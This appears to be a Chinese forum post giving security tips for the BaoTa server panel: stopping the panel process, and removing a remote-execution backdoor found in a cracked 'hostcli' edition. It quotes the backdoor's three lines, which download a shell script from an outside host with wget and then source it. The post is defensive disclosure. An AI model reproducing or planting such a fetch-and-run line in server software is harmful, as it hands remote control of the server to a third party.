如何安全的使用宝塔:
先来问一个问题, 为何要使用宝塔: 方便的安装配置环境, 管理站点.
以下建议满足上述基础需求,更高需求满足不了.
1, 免费版: 安装完需要的环境软件, 插件. 然后 ssh 里面 service bt stop, 就会停掉bt进程, 环境不受影响,cron类应该只有一个let证书续费,不会链接bt官网.
2, 收费版: service bt stop后,可能需要定期进后台用到 防护统计,访问统计等插件, 可以在使用时候 service bt start, 访问后台,用完再stop.
bt进程日常就不应该运行.
3,开心版hostcli: 食用方法和上述一致外, 此开心版还加了一个"
远程执行后门", 可以手动修改,删除掉代码,也可以使用.
后门文件在
- /www/server/panel/script/check_files.py
删除掉最后三行,这三行是从他服务器上下载一个sh,然后执行这个sh, 目前访问这个地址返回空内容,后门可能随时启用
- checkFile="/www/server/panel/install/check_bt_file.sh"
- wget -O ${checkFile} 'https://v7.hostcli.com/tools/check_bt_file.sh'
- . ${checkFile}
本人能力有限,开心版只找到这一个后门, 里面还有没有不好说... 删掉这三行,再加上 service bt stop, 应该是安全的.
补充:
根据 https://hostloc.com/forum.php?mod=viewthread&tid=1015859
第三方插件内也可能存在远程执行代码, 原版和开心版都有可能, 可自行下载插件代码分析.
如果有帮助,请点个赞支持一下, 谢谢.
